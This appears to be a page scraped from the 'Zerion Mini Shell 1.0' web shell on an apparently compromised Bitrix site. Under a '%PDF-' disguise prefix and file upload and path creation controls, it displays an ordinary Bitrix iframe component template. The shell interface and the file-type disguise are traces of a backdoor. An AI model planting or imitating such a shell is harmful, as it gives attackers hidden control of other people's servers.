%PDF- %PDF-
Mini Shell

Mini Shell

Direktori : /home/bitrix/www/bitrix/components/bitrix/rest.marketplace.iframe/templates/.default/
Upload File :
Create Path :
Current File : /home/bitrix/www/bitrix/components/bitrix/rest.marketplace.iframe/templates/.default/template.php

<?php
if(!defined("B_PROLOG_INCLUDED") || B_PROLOG_INCLUDED !== true)
{
	die();
}

/**
 * Bitrix vars
 *
 * @var array $arParams
 * @var array $arResult
 * @var CBitrixComponent $component
 * @var CBitrixComponentTemplate $this
 * @global CMain $APPLICATION
 * @global CUser $USER
 */

\CJSCore::Init(array("sidepanel"));
?>
<!DOCTYPE html>
<html>
<head>
<script>
	// Prevent loading page without header and footer
	if(window === window.top)
	{
		window.location = "<?=CUtil::JSEscape($APPLICATION->GetCurPageParam('', array('IFRAME'))); ?>";
	}
</script>
<?$APPLICATION->ShowHead();?>
</head>
<body class="rest-mp-slider-body">
<div class="rest-mp-slider-wrap">
	<?php
	$APPLICATION->IncludeComponent(
		$arParams['COMPONENT_NAME'],
		$arParams['COMPONENT_TEMPLATE_NAME'],
		$arParams['COMPONENT_PARAMS'],
		$component,
		array('HIDE_ICONS' => 'Y')
	);
	?>
</div>
</body>
</html>

Zerion Mini Shell 1.0